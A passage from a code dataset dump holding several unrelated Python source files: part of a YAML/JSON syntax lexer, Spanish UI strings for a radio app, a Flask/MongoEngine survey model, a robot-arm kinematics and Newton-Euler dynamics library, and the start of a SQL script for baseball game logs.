]+)([0-9]+\\\\.[0-9]+)',\n bygroups(Text, Number), 'ignored-line')], \n 'tag-directive':[\n (\n \"([ ]+)(!|![\\\\w-]*!)([ ]+)(!|!?[\\\\w;/?:@&=+$,.!~*\\\\'()\\\\[\\\\]%-]+)\",\n bygroups(Text, Keyword.Type, Text, Keyword.Type),\n 'ignored-line')], \n 'indentation':[\n (\n '[ ]*$', something(Text), '#pop:2'),\n (\n '[ ]+(?=[?:-](?:[ ]|$))', save_indent(Text)),\n (\n '[?:-](?=[ ]|$)', set_indent(Punctuation.Indicator)),\n (\n '[ ]*', save_indent(Text), '#pop')], \n 'block-line':[\n (\n '[ ]*(?=#|$)', something(Text), '#pop'),\n (\n '[ ]+', Text),\n (\n '([^#,:?\\\\[\\\\]{}\"\\'\\\\n]+)(:)(?=[ ]|$)',\n bygroups(Name.Tag, set_indent(Punctuation, implicit=True))),\n include('descriptors'),\n include('block-nodes'),\n include('flow-nodes'),\n (\n '(?=[^\\\\s?:,\\\\[\\\\]{}#&*!|>\\\\\\'\"%@`-]|[?:-]\\\\S)',\n something(Name.Variable),\n 'plain-scalar-in-block-context')], \n 'descriptors':[\n (\n \"!<[\\\\w#;/?:@&=+$,.!~*\\\\'()\\\\[\\\\]%-]+>\", Keyword.Type),\n (\n \"!(?:[\\\\w-]+!)?[\\\\w#;/?:@&=+$,.!~*\\\\'()\\\\[\\\\]%-]*\",\n Keyword.Type),\n (\n '&[\\\\w-]+', Name.Label),\n (\n '\\\\*[\\\\w-]+', Name.Variable)], \n 'block-nodes':[\n (\n ':(?=[ ]|$)', set_indent((Punctuation.Indicator), implicit=True)),\n (\n '[|>]', Punctuation.Indicator,\n ('block-scalar-content', 'block-scalar-header'))], \n 'flow-nodes':[\n (\n '\\\\[', Punctuation.Indicator, 'flow-sequence'),\n (\n '\\\\{', Punctuation.Indicator, 'flow-mapping'),\n (\n \"\\\\'\", String, 'single-quoted-scalar'),\n (\n '\\\\\"', String, 'double-quoted-scalar')], \n 'flow-collection':[\n (\n '[ ]+', Text),\n (\n '\\\\n+', Text),\n (\n '#[^\\\\n]*', Comment.Single),\n (\n '[?:,]', Punctuation.Indicator),\n include('descriptors'),\n include('flow-nodes'),\n (\n '(?=[^\\\\s?:,\\\\[\\\\]{}#&*!|>\\\\\\'\"%@`])',\n something(Name.Variable),\n 'plain-scalar-in-flow-context')], \n 'flow-sequence':[\n include('flow-collection'),\n (\n '\\\\]', Punctuation.Indicator, '#pop')], \n 'flow-mapping':[\n (\n '([^,:?\\\\[\\\\]{}\"\\'\\\\n]+)(:)(?=[ ]|$)',\n bygroups(Name.Tag, Punctuation)),\n include('flow-collection'),\n (\n '\\\\}', Punctuation.Indicator, '#pop')], \n 'block-scalar-content':[\n (\n '\\\\n', Text),\n (\n '^[ ]+$',\n parse_block_scalar_empty_line(Text, Name.Constant)),\n (\n '^[ ]*', parse_block_scalar_indent(Text)),\n (\n '[\\\\S\\\\t ]+', Name.Constant)], \n 'block-scalar-header':[\n (\n '([1-9])?[+-]?(?=[ ]|$)',\n set_block_scalar_indent(Punctuation.Indicator),\n 'ignored-line'),\n (\n '[+-]?([1-9])?(?=[ ]|$)',\n set_block_scalar_indent(Punctuation.Indicator),\n 'ignored-line')], \n 'quoted-scalar-whitespaces':[\n (\n '^[ ]+', Text),\n (\n '[ ]+$', Text),\n (\n '\\\\n+', Text),\n (\n '[ ]+', Name.Variable)], \n 'single-quoted-scalar':[\n include('quoted-scalar-whitespaces'),\n (\n \"\\\\'\\\\'\", String.Escape),\n (\n \"[^\\\\s\\\\']+\", String),\n (\n \"\\\\'\", String, '#pop')], \n 'double-quoted-scalar':[\n include('quoted-scalar-whitespaces'),\n (\n '\\\\\\\\[0abt\\\\tn\\\\nvfre \"\\\\\\\\N_LP]', String),\n (\n '\\\\\\\\(?:x[0-9A-Fa-f]{2}|u[0-9A-Fa-f]{4}|U[0-9A-Fa-f]{8})',\n String.Escape),\n (\n '[^\\\\s\"\\\\\\\\]+', String),\n (\n '\"', String, '#pop')], \n 'plain-scalar-in-block-context-new-line':[\n (\n '^[ ]+$', Text),\n (\n '\\\\n+', Text),\n (\n '^(?=---|\\\\.\\\\.\\\\.)', something(Name.Namespace), '#pop:3'),\n (\n '^[ ]*', parse_plain_scalar_indent(Text), '#pop')], \n 'plain-scalar-in-block-context':[\n (\n '[ ]*(?=:[ ]|:$)', something(Text), '#pop'),\n (\n '[ ]+(?=#)', Text, '#pop'),\n (\n '[ ]+$', Text),\n (\n '\\\\n+', Text, 'plain-scalar-in-block-context-new-line'),\n (\n '[ ]+', Literal.Scalar.Plain),\n (\n '(?::(?!\\\\s)|[^\\\\s:])+', Literal.Scalar.Plain)], \n 'plain-scalar-in-flow-context':[\n (\n '[ ]*(?=[,:?\\\\[\\\\]{}])', something(Text), '#pop'),\n (\n '[ ]+(?=#)', Text, '#pop'),\n (\n '^[ ]+', Text),\n (\n '[ ]+$', Text),\n (\n '\\\\n+', Text),\n (\n '[ ]+', Name.Variable),\n (\n '[^\\\\s,:?\\\\[\\\\]{}]+', Name.Variable)]}\n\n def get_tokens_unprocessed(self, text=None, context=None):\n if context is None:\n context = YamlLexerContext(text, 0)\n return super(YamlLexer, self).get_tokens_unprocessed(text, context)\n\n\nclass JsonLexer(RegexLexer):\n __doc__ = '\\n For JSON data structures.\\n\\n .. versionadded:: 1.5\\n '\n name = 'JSON'\n aliases = ['json']\n filenames = ['*.json']\n mimetypes = ['application/json']\n flags = re.DOTALL\n int_part = '-?(0|[1-9]\\\\d*)'\n frac_part = '\\\\.\\\\d+'\n exp_part = '[eE](\\\\+|-)?\\\\d+'\n tokens = {'whitespace':[\n (\n '\\\\s+', Text)], \n 'simplevalue':[\n (\n '(true|false|null)\\\\b', Keyword.Constant),\n (\n '%(int_part)s(%(frac_part)s%(exp_part)s|%(exp_part)s|%(frac_part)s)' % vars(),\n Number.Float),\n (\n int_part, Number.Integer),\n (\n '\"(\\\\\\\\\\\\\\\\|\\\\\\\\\"|[^\"])*\"', String.Double)], \n 'objectattribute':[\n include('value'),\n (\n ':', Punctuation),\n (\n ',', Punctuation, '#pop'),\n (\n '\\\\}', Punctuation, '#pop:2')], \n 'objectvalue':[\n include('whitespace'),\n (\n '\"(\\\\\\\\\\\\\\\\|\\\\\\\\\"|[^\"])*\"', Name.Tag, 'objectattribute'),\n (\n '\\\\}', Punctuation, '#pop')], \n 'arrayvalue':[\n include('whitespace'),\n include('value'),\n (\n ',', Punctuation),\n (\n '\\\\]', Punctuation, '#pop')], \n 'value':[\n include('whitespace'),\n include('simplevalue'),\n (\n '\\\\{', Punctuation, 'objectvalue'),\n (\n '\\\\[', Punctuation, 'arrayvalue')], \n 'root':[\n include('value')]}\n\n\nclass JsonBareObjectLexer(JsonLexer):\n __doc__ = '\\n For JSON data structures (with missing object curly braces).\\n\\n .. versionadded:: 2.2\\n '\n name = 'JSONBareObject'\n aliases = ['json-object']\n filenames = []\n mimetypes = ['application/json-object']\n tokens = {'root':[\n (\n '\\\\}', Error),\n include('objectvalue')], \n 'objectattribute':[\n (\n '\\\\}', Error),\n inherit]}\n\n\nclass JsonLdLexer(JsonLexer):\n __doc__ = '\\n For `JSON-LD `_ linked data.\\n\\n .. versionadded:: 2.0\\n '\n name = 'JSON-LD'\n aliases = ['jsonld', 'json-ld']\n filenames = ['*.jsonld']\n mimetypes = ['application/ld+json']\n tokens = {'objectvalue': [\n (\n '\"@(context|id|value|language|type|container|list|set|reverse|index|base|vocab|graph)\"',\n Name.Decorator,\n 'objectattribute'),\n inherit]}","sub_path":"pycfiles/libopenstorage_openstorage-0.42.24.1-py3-none-any/data.cpython-36.py","file_name":"data.cpython-36.py","file_ext":"py","file_size_in_byte":14298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"9648595","text":"# -*- coding: utf-8 -*-\n# spanish literals\n\nMENU = u'Menu'\n\nRADIO = u'Web Radio'\nFM = u'FM Radio'\nBLUETOOTH = u'Bluetooth'\nOPTIONS = u'Opciones'\n\nFAVORITES = u'favoritos'\nRECENT = u'reciente'\nTAGS = u'etiquetas'\nCOUNTRIES = u'paises'\nLANGUAGES = u'idiomas'\nEMPTY = u'vacio'\nSEARCH = u'buscar'\n\nPLAY = u'reproducir'\nADD_FAVORITES = u'añadir a favoritos'\nMORE_INFO = u'mas información'\nREMOVE_FAVORITES = u'quitar de favoritos'\n\nKEYBOARD0 = [['q', 'w', 'e', 'r', 't', 'y', 'u', 'i', 'o', 'p', '<'],\n ['a', 's', 'd', 'f', 'g', 'h', 'j', 'k', 'l', u'▼', u'◄'],\n ['^', 'z', 'x', 'c', u'═══', 'v', 'b', 'n', u'ñ', 'm']]\n\nKEYBOARD1 = [['Q', 'W', 'E', 'R', 'T', 'Y', 'U', 'I', 'O', 'P', '<'],\n ['A', 'S', 'D', 'F', 'G', 'H', 'J', 'K', 'L', u'▼', u'◄'],\n ['^', 'Z', 'X', 'C', u'═══', 'V', 'B', 'N', u'Ñ', 'M']]\n\nKEYBOARD2 = [['1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '<'],\n [u'@', u'€', u'_', u'&', u'-', u'+', u'(', u')', u'/', u'▼', u'◄'],\n ['^', '*', '\"', \"'\", u'═══', ':', ';', '!', '?']]\n\nKEYBOARDS = [KEYBOARD0, KEYBOARD1, KEYBOARD2]\n\nWIFI = u'wifi'\nSSID = u'ssid'\nPASSWORD = u'contraseña'\nREMOVE = u'olvidar'\nCHECK = u'comprobar'\nUPDATE = u'actualizar'\n\nSTATION = u'estación'\nTITLE = u'título'\nTIME = u'tiempo'\nAUDIO = u'audio'\nBITRATE = u'bitrate'\n\nNAME = u'nombre'\nCOUNTRY = u'país'\nSUBCOUNTRY = u'subpais'\nHOMEPAGE = u'página web'\nURL = u'url'\nLANGUAGE = u'idiomas'","sub_path":"i18n/es.py","file_name":"es.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"571297316","text":"# -*- coding: utf-8 -*-\nfrom mongoengine import *\n\nfrom flask.ext.mongoengine.wtf import model_form\nfrom datetime import datetime\n\n\nclass Comment(EmbeddedDocument):\n\tname = StringField()\n\tcomment = StringField()\n\ttimestamp = DateTimeField(default=datetime.now())\n\nclass Info(Document):\n\n\tname = StringField(max_length=120, required=True, verbose_name=\"Name\")\t\n\temail = StringField(max_length=120, required=True, verbose_name=\"Email Address\")\n\tyear = StringField(max_length=120, required=True, verbose_name=\"Year Graduated\")\n\tbackground = StringField(required=True, verbose_name=\"Background before ITP\")\n\tafterITP = StringField(required=True, verbose_name=\"After ITP\", help_text=\"What field/industry/work are you doing after ITP?\")\n\tage = StringField(max_length=50, required=True, verbose_name=\"Age (at start of ITP)\", help_text=\"What was your age when you started ITP?\")\n\tloans = StringField(choices= [('range1','$0 - $1,000'), ('range2','$1,000 - $15,000'), ('range3','$15,000 - $30,000'), ('range4','$30,000 - $45,000,'), ('range5','$45,000 - $60,000'), ('range6','$60,000 - $75,000'), ('range7', '75,000 - $90,000'), ('range8', '$90,000 - $105,000'), ('range8', 'greater than $106,000'), ('no answer', 'I would rather not say')], required=False, verbose_name=\"Total Loans Taken Out\", help_text=\"If you accepted loans for ITP, how much did they total?\")\n\tgender = StringField(choices = [('male','Male'),('female','Female')], verbose_name = \"Gender\", help_text=\"What is your gender?\")\n\tscholarship = StringField(required=True, choices = [(\"yes\", \"yes\",),(\"no\",\"no\")], verbose_name = \"Scholarship\", help_text=\"Did you receive any scholarship money from NYU?\")\n\n\t#slug just makes things look cleaner in the browser. \n\tslug = StringField()\n\t# Category is a list of Strings\n\tcategories = ListField(StringField(max_length=30))\n\n\n\t# Comments is a list of Document type 'Comments' defined above\n\tcomments = ListField( EmbeddedDocumentField(Comment) )\n\n\t# Timestamp will record the date and time idea was created.\n\ttimestamp = DateTimeField(default=datetime.now())\n\nInfoForm = model_form(Info)\n\n\t\n\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"293332029","text":"###\n# Based on Robotics Toolbox for Matlab created by Peter Corke\n#\n# Author: Rafael Torres\n#\n# 31 March 2020\n###\n\nimport numpy as np\nfrom math import sin, cos\nimport robopy.robot.transforms as tr\nimport robopy.robot.plot as robotplt\n\nclass Link:\n \"\"\"\n Link object class.\n \"\"\"\n\n def __init__(self, \n alpha=0, A=0, theta=None, D=None, sigma=None, offset=0, mdh=None, qlim=None, \n m=0, r=None, I=None):\n \"\"\"\n Initializes the link object.\n \n Kinematic params:\n :param alpha: Link twist\n :param A: Link length\n :param theta: Joint angle\n :param D: Link offset\n :param sigma: [0, \"Revolute\" or 'R'] if revolute, [1, \"Prismatic\" or 'P'] if prismatic\n :param offset: Joint variable offset\n :param mdh: 0 if standard D&H, else 1\n :param qlim: Joint variable limits [min max]\n\n Dynamic params:\n :param m: Link mass\n :param r: Link COG with respect to link coordinate frame, in format 1x3 [x, y, z]\n :param I: Link inertia matrix, symmetric 3x3, about link COG\n \"\"\"\n\n # Defaults\n self.alpha = 0\n self.A = 0\n self.theta = 0\n self.d = 0\n self.sigma = None # Type will be retrieved from parameters parsed\n self.offset = 0\n self.mdh = 0\n self.qlim = []\n self.m = 0\n self.r = np.zeros(3)\n self.I = np.zeros( (3, 3) ) \n\n ### Type checking ###\n if sigma != None:\n if isinstance(sigma, str):\n sigma = sigma.lower()\n \n if sigma == \"revolute\" or sigma == 'r':\n self.sigma = 0\n elif sigma == \"prismatic\" or sigma == 'p':\n self.sigma = 1\n else:\n raise ValueError\n elif isinstance(sigma, int):\n if sigma not in [0, 1]:\n raise ValueError\n\n self.sigma = sigma\n else:\n raise AttributeError\n\n if(self.sigma == 0):\n assert ( theta==None ), \"'Theta' cannot be specified for a Revolute link!\"\n elif(self.sigma == 1):\n assert ( D==None ), \"'d' cannot be specified for a Prismatic link!\"\n\n assert( theta!=None or D!=None ), \"Cannot specify 'd' and 'theta'\"\n\n ### D&H parameters check\n if isinstance(alpha, (int, float)) and isinstance(A, (int, float)):\n self.alpha = alpha\n self.a = A\n else:\n raise AttributeError\n\n if theta != None:\n if isinstance(theta, (int, float)):\n self.theta = theta\n if sigma == None: # Constant value of theta means it must be prismatic\n sigma = 1\n else:\n raise AttributeError\n \n if D != None:\n if isinstance(D, (int, float)):\n self.d = D\n if sigma == None: # Constant value of D means it must be revolute\n sigma = 0\n else:\n raise AttributeError\n\n if isinstance(offset, (int, float)):\n self.offset = offset\n else:\n raise AttributeError\n\n if qlim:\n if isinstance(qlim, list) and isinstance(qlim[0], (int, float)) and len(qlim) == 2:\n self.qlim = qlim\n else:\n raise AttributeError\n\n ### Mass checks\n if isinstance(m, (int, float)):\n self.m = m\n else:\n raise AttributeError\n\n ### COG position check\n if r:\n if isinstance(r, list) and isinstance(r[0], (int, float)) and len(r) == 3:\n self.r = np.array(r)\n else:\n raise AttributeError\n\n ### Inertia check\n if I:\n if isinstance(I, list) and isinstance(I[0], list) and isinstance(I[0][0], (int, float)) and len(I) == 3 and len(I[0]) == 3:\n self.I = np.array(I)\n else:\n raise AttributeError\n\n ### D&H Convention checking ###\n if mdh == None:\n self.mdh = 0 # Standard: Classis D&H\n else:\n if isinstance(mdh, str):\n mdh = mdh.lower()\n \n if mdh == \"classic\" or mdh == 'c':\n self.mdh = 0\n elif mdh == \"modified\" or mdh == 'm':\n self.mdh = 1\n else:\n raise ValueError\n elif isinstance(mdh, int):\n if mdh not in [0, 1]:\n raise ValueError\n\n self.mdh = mdh\n else:\n raise AttributeError\n\n def isrevolute(self):\n return self.sigma == 0\n\n def isprismatic(self):\n return self.sigma == 1\n\n def Tm(self, q):\n \"\"\"\n Calculates a transformation matrix for the current link\n - For standard DH parameters, this is from the previous frame to the current\n - For modified DH parameters, this is from the current frame to the previous\n\n Note:\n - The link offset parameter is added to 'q' before computation of the matrix\n\n :param q: Value of the D&H non fixed parameter, 'theta' for revolute links and 'd' for prismatic links\n\n :returns 4x4 numpy.ndarray representing the Transformation Matrix \n \"\"\"\n\n sa = sin(self.alpha)\n ca = cos(self.alpha)\n a = self.a\n\n q = q + self.offset\n\n if self.isrevolute():\n st = sin(q)\n ct = cos(q)\n d = self.d\n else:\n st = sin(self.theta)\n ct = cos(self.theta)\n d = q\n\n if self.mdh == 0:\n\n return np.array([[ct, -st*ca, st*sa, a*ct],\n [st, ct*ca, -ct*sa, a*st],\n [ 0, sa, ca, d ],\n [ 0, 0, 0, 1 ]])\n\n else:\n\n return np.array([[ ct, -st, 0, a ],\n [st*ca, ct*ca, -sa, -sa*d],\n [st*sa, ct*sa, ca, ca*d],\n [ 0, 0, 0, 1 ]])\n\nclass Revolute(Link):\n \"\"\"\n Revolute Link object class.\n \"\"\"\n\n def __init__(self, \n alpha=0, A=0, theta=None, D=None, offset=0, mdh=None, qlim=None, \n m=0, r=None, I=None):\n \"\"\"\n Initializes revolute link.\n Check Link class to understand params\n \"\"\"\n super().__init__(alpha=alpha, A=A, theta=theta, D=D, sigma=\"Revolute\", offset=offset, mdh=mdh, qlim=qlim,\n m=m, r=r, I=I)\n pass\n\nclass Prismatic(Link):\n \"\"\"\n Prismatic Link object class.\n \"\"\"\n\n def __init__(self, \n alpha=0, A=0, theta=None, D=None, offset=0, mdh=None, qlim=None, \n m=0, r=None, I=None):\n \"\"\"\n Initializes Prismatic link.\n Check Link class to understand params\n \"\"\"\n super().__init__(alpha=alpha, A=A, theta=theta, D=D, sigma=\"Prismatic\", offset=offset, mdh=mdh, qlim=qlim,\n m=m, r=r, I=I)\n pass\n\nclass SerialLink:\n \"\"\"\n SerialLink object class.\n \"\"\"\n\n def __init__(self, arg=None, gravity=None, base=None, tool=None, name=\"\"):\n \"\"\"\n Creates a SerialLink object.\n :param links: List of Link objects that will constitute the SerialLink object.\n :param gravity: Direction of gravity [gx, gy, gz]\n :param base: Pose of robot's base (4x4)\n :param tool: Robot's tool transform, with respect to last link coordinate frame\n \"\"\"\n\n # Defaults\n self.links = []\n\n self.gravity = np.array([0, 0, 9.81])\n self.base = np.identity(4)\n self.tool = np.identity(4)\n self.name = \"noname\"\n\n self.mdh = -1\n\n if isinstance(arg, list):\n if isinstance(arg[0], Link):\n self.links = arg\n else: \n raise AttributeError\n else:\n raise AttributeError # Other initialization methods not implemented yet\n\n # Check links for D&H convention\n for link in self.links:\n if( (link.mdh != self.mdh) and (self.mdh != -1) ):\n raise ValueError(\"Links have mixed D&H conventions!\")\n else:\n self.mdh = link.mdh\n\n if name:\n self.name = name\n\n # Gravity checks\n if gravity != None:\n assert ( isinstance(gravity, list) \n and len(gravity)==3 \n and isinstance(gravity[0], (int, float)) ), \"Gravity must be a 1x3 list of int or floats\"\n self.gravity = np.array(gravity)\n\n # Base transformation checks\n if base != None:\n assert ( isinstance(base, list) \n and len(base)==4 \n and isinstance(base[0], list)\n and len(base[0])==4\n and isinstance(base[0][0], (int, float))), \"Base must be a 4x4 list of int or floats\"\n self.base = np.array(base)\n\n # Tool transformation checks\n if tool != None:\n assert ( isinstance(tool, list) \n and len(tool)==4 \n and isinstance(tool[0], list)\n and len(tool[0])==4\n and isinstance(tool[0][0], (int, float))), \"Tool must be a 4x4 list of int or floats\"\n self.tool = np.array(tool)\n\n def append_link(self, link):\n if isinstance(link, Link):\n if( self.mdh != -1 ):\n assert (link.mdh == self.mdh), \"Links have mixed D&H conventions!\" \n else:\n self.mdh = link.mdh\n \n self.links.append(link)\n else:\n raise AttributeError\n\n def __add__(self, link):\n self.append_link(link)\n\n return self\n\n def __len__(self):\n return len(self.links)\n\n def display(self):\n \n ### SerialLink info ###\n print('\\n' + self.name + \": \" + str(len(self)) + \" axis\", end=\"\")\n if(self.mdh==0):\n print(\", standard D&H\\n\")\n elif(self.mdh==1):\n print(\", modified D&H\\n\")\n else:\n print('\\n')\n\n ### Links info ###\n space_to_j = 3\n space_to_params = 10\n\n params=[\"theta\", 'd', 'a', \"alpha\", \"offset\"]\n\n header_str = '+' + ('-'*space_to_j) + len(params)*('+' + ('-'*space_to_params)) + '+' # +---+----------+ (...)\n\n # Strings formatting:\n # ^x -> Center in a block of 'x' size\n # .y -> Limit to a block of 'x' size\n j_format = (\"{:^\" + str(space_to_j) + '.' + str(space_to_j) + '}') # \"{:^3.3}\" \n param_format = (\"{:^\" + str(space_to_params) + '.' + str(space_to_params) + '}') # \"{:^10.10}\"\n \n # Header display\n print(header_str)\n\n print('|' + j_format.format('j'), end=\"\")\n \n for param in params:\n print('|' + param_format.format(param), end=\"\")\n\n print('|') \n print(header_str)\n # End of header display\n\n for j, link in enumerate(self.links):\n \n # Index printing\n print('|' + j_format.format( str(j+1) ), end=\"\")\n\n # Parameters printing\n for param in params:\n print('|' + param_format.format( str( getattr(link, param) ) ), end=\"\")\n\n print('|')\n\n print(header_str + '\\n') # But isn't this the footer? ¯\\_(u.u)_/¯\n\n ### Gravity, base and tool info ###\n grav_format = (\"{:>4.4}\")\n base_format = (\"{:>4.4}\")\n tool_format = (\"{:>4.4}\")\n\n grav_title = \"grav = \"\n base_title = \" base =\"\n tool_title = \" tool =\"\n for row in range( len(self.base) ):\n try:\n print(grav_title + grav_format.format( str(self.gravity[row]) ), end=\"\")\n except IndexError:\n # Gravity only has 3 rows while base and tool transforms have 4, so, print placeholder\n print(grav_title + ' '*len(grav_format.format( str(self.gravity[0]) )), end=\"\")\n\n print(base_title, end=\"\")\n for value in self.base[row]:\n print(' ' + base_format.format( str(value) ), end=\"\")\n\n print(tool_title, end=\"\")\n for value in self.tool[row]:\n print(' ' + tool_format.format( str(value) ), end=\"\")\n\n print()\n\n if row == 0:\n # After first row titles are no longer necessary, substitute for placeholder\n grav_title = ' '*len(grav_title)\n base_title = ' '*len(base_title)\n tool_title = ' '*len(tool_title)\n\n print()\n\n def rne(self, Q, QD=None, QDD=None, PL=None):\n \"\"\"\n Verifies input arguments and calculates torques using recursive Newton-Euler equations\n indirectly by calling the adequate methods\n\n :param Q: Array of joint positions\n :param QD: Array of joint velocities -> Qderivative = V\n :param QDD: Array of joint accelerations -> Vderivative\n :param PL: Array describing external forces (payload) on the end effector [Fx Fy Fz Nx Ny Nz]\n\n :return: Array of joint torques\n \"\"\"\n assert len(self), \"No links detected!\"\n\n if not isinstance(Q, list):\n raise AttributeError \n Q = np.array(Q)\n assert Q.shape == (len(self),), \"Wrong dimension!\"\n\n if QD != None:\n if not isinstance(QD, list):\n raise AttributeError\n QD = np.array(QD)\n assert QD.shape == (len(self),), \"Wrong dimension!\"\n else:\n QD = np.zeros(len(self))\n\n if QDD != None:\n if not isinstance(QDD, list):\n raise AttributeError\n QDD = np.array(QDD)\n assert QDD.shape == (len(self),), \"Wrong dimension!\"\n else:\n QDD = np.zeros(len(self))\n\n if PL != None:\n if not isinstance(PL, list):\n raise AttributeError\n PL = np.array(PL)\n assert PL.shape == (6,), \"Wrong dimension!\"\n else:\n PL = np.zeros(6)\n\n if self.mdh == 0:\n return self.__rne_dh(Q, QD, QDD, PL)\n elif self.mdh == 1:\n return self.__rne_mdh(Q, QD, QDD, PL)\n\n def __rne_dh(self, q, qd=None, qdd=None, pl=None):\n \"\"\"\n Calculates torques for joints using Recursive Newton-Euler equations\n Assumes classic D&H notation\n\n Invoque this method indirectly calling the 'rne' method\n \"\"\"\n print(\"Calculating torques...\")\n\n def __rne_mdh(self, q, qd=None, qdd=None, pl=None):\n \"\"\"\n Calculates torques for joints using Recursive Newton-Euler equations\n Assumes modified D&H notation\n\n Invoque this method indirectly calling the 'rne' method\n\n TODO: Include payload and external forces\n \"\"\"\n\n # Set debug to\n # 0 -> No messages\n # 1 -> Display results of outwards and inwards recursion\n debug = 0\n\n # Initial setup\n z = np.array([0, 0, 1]) # Initial 'Z' points \"up\", 'X' and 'Y' constitute top plane\n\n w = np.zeros(3) # Base has 0 joint angle,\n wd = np.zeros(3) # 0 joint speed and\n vd = self.gravity # fictitious upwards acceleration\n \n tau = np.zeros(len(self))\n F = np.zeros( (len(self), 3) )\n N = np.zeros( (len(self), 3) )\n\n if debug:\n print(\"\\nOutwards iterations\")\n\n # Outwards iteration\n for j, link in enumerate(self.links):\n Tm = link.Tm(q[j])\n\n if j == 0:\n # Include base transform\n Tm = self.base * Tm\n\n R = tr.t2r(Tm)\n R = np.linalg.inv(R) # Inverse\n \n P = (Tm)[0:-1, -1]\n\n Pc = link.r\n m = link.m\n I = link.I\n\n #\n # Trailing underscore means new value\n #\n if link.isrevolute():\n w_ = np.matmul(R, w) + qd[j]*z\n wd_ = np.matmul(R, wd) + np.cross(np.matmul(R, w), qd[j]*z) + qdd[j]*z\n vd_ = np.matmul(R, ( np.cross(wd, P) + np.cross(w, np.cross(w, P) ) + vd ) ) \n elif link.isprismatic():\n w_ = np.matmul(R, w)\n wd_ = np.matmul(R, wd)\n vd_ = ( np.matmul(R, ( np.cross(wd, P) + np.cross(w, np.cross(w, P) ) + vd ) ) + \n 2*np.cross(w_, qd[j]*z) + qdd[j]*z )\n\n vdc = np.cross(wd_, Pc) + np.cross(w_, np.cross(w_, Pc) ) + vd_\n \n F[j] = m*vdc\n N[j] = np.matmul(I, wd_) + np.cross(w_, np.matmul(I, w_) )\n\n # Update variables\n w = w_\n wd = wd_\n vd = vd_\n\n if debug:\n print(\"\\nLink \" + str(j+1) + ':')\n print(\"w = \" + str(w))\n print(\"wd = \" + str(wd))\n print(\"vd = \" + str(vd))\n print(\"vdc = \" + str(vdc))\n print(\"\\nF = \" + str(F[j]))\n print(\"N = \" + str(N[j]))\n\n f = pl[:3]\n n = pl[3:]\n\n # Initial transform matrix\n Tm = self.tool\n\n if debug:\n print(\"\\nInwards iterations\")\n\n # Inwards iteration\n for j, link in reversed( list( enumerate(self.links) ) ):\n \n R = tr.t2r(Tm)\n P = (Tm)[0:-1, -1]\n \n Pc = link.r \n\n #\n # Trailing underscore means new value\n #\n f_ = np.matmul(R, f) + F[j]\n n_ = N[j] + np.matmul(R, n) + np.cross(Pc, F[j]) + np.cross(P, np.matmul(R, f) )\n\n if link.isrevolute():\n tau[j] = np.matmul(n_, z)\n elif link.isprismatic():\n tau[j] = np.matmul(f_, z)\n\n # Update variables\n f = f_\n n = n_\n Tm = link.Tm(q[j])\n\n if debug:\n print(\"\\nLink \" + str(j+1) + ':')\n print(\"f = \" + str(f))\n print(\"n = \" + str(n))\n\n if debug:\n print()\n\n return tau\n\n def fkine(self, q):\n \"\"\"\n Forward Kinematics of manipulator\n \n :param q: The joint angles/configuration of the robot.\n \n :return: Pose of tool, shape (4, 4); \n :return: Array with shape (len(q), 4, 4), containing \n pose of joints.\n\n TODO: Options parameter to treat q array as degrees, not radians \n Assertions on 'q' size and number of links\n Trajectories\n \"\"\" \n\n pose_all = np.zeros((len(q), 4, 4))\n\n t = self.base\n\n for i in range(len(q)):\n t = np.matmul( t, self.links[i].Tm(q[i]) )\n\n pose_all[i] = t\n\n t = np.matmul( t, self.tool )\n\n return t, pose_all\n\n # Define the initial value for plotter\n plotter = None\n def plot(self, q, optimize=False):\n \"\"\"\n Graphical display of manipulator\n \n :param q: The joint angles/configuration of the robot.\n \"\"\"\n\n # Initialization\n if self.plotter is None:\n self.plotter = robotplt.Plotter(optimize)\n\n # Calculate forward kinematics\n t, pose_all = self.fkine(q)\n\n self.plotter.plot(self.base, pose_all, t)","sub_path":"robot/link.py","file_name":"link.py","file_ext":"py","file_size_in_byte":19686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"546949510","text":"umpires = [\n('hp_umpire_id', 'UHP'),\n('[1b_umpire_id]', 'U1B'),\n('[2b_umpire_id]', 'U2B'),\n('[3b_umpire_id]', 'U3B'),\n('lf_umpire_id', 'ULF'),\n('rf_umpire_id', 'URF'),\n]\n\n# Insert data for pitchers and managers\n\"\"\"\nINSERT OR IGNORE INTO person_appearance\n (\n person_id,\n team_id,\n game_id,\n appearance_type_id\n )\n\n\tSELECT\n\t\tv_manager_id,\n\t\tv_name,\n\t game_id,\n\t \"MM\"\n\tFROM game_log\n\tWHERE v_manager_id IS NOT NULL\n\nUNION\n\n SELECT\n h_manager_id,\n h_name,\n game_id,\n \"MM\"\n FROM game_log\n WHERE h_manager_id IS NOT NULL\n\nUNION\n\n SELECT\n winning_pitcher_id,\n CASE\n WHEN h_score > v_score THEN h_name\n ELSE v_name\n END,\n game_id,\n \"AWP\"\n FROM game_log\n WHERE winning_pitcher_id IS NOT NULL\n\nUNION\n\t\n\tSELECT\n losing_pitcher_id,\n CASE\n WHEN h_score < v_score THEN h_name\n ELSE v_name\n END,\n game_id,\n \"AWP\"\n FROM game_log\n WHERE losing_pitcher_id IS NOT NULL\n\nUNION\n\n\tSELECT\n\t\tsaving_pitcher_id,\n\t\tCASE\n WHEN h_score > v_score THEN h_name\n ELSE v_name\n END,\n game_id,\n \"ASP\"\n FROM game_log\n WHERE saving_pitcher_id IS NOT NULL\n\nUNION\n\n\tSELECT\n\t\twinning_rbi_batter_id, \n\t\tCASE\n WHEN h_score > v_score THEN h_name\n ELSE v_name\n END,\n game_id,\n \"AWB\"\n FROM game_log\n WHERE winning_rbi_batter_id IS NOT NULL\n\nUNION\n\n\tSELECT\n\t\tv_starting_pitcher_id,\n\t\tv_name,\n\t\tgame_id,\n\t\t\"PSP\"\n\tFROM game_log\n\tWHERE v_starting_pitcher_id IS NOT NULL\n\nUNION\n\n\tSELECT\n\t\th_starting_pitcher_id,\n\t\th_name,\n\t\tgame_id,\n\t\t\"PSP\"\n\tFROM game_log\n\tWHERE h_starting_pitcher_id IS NOT 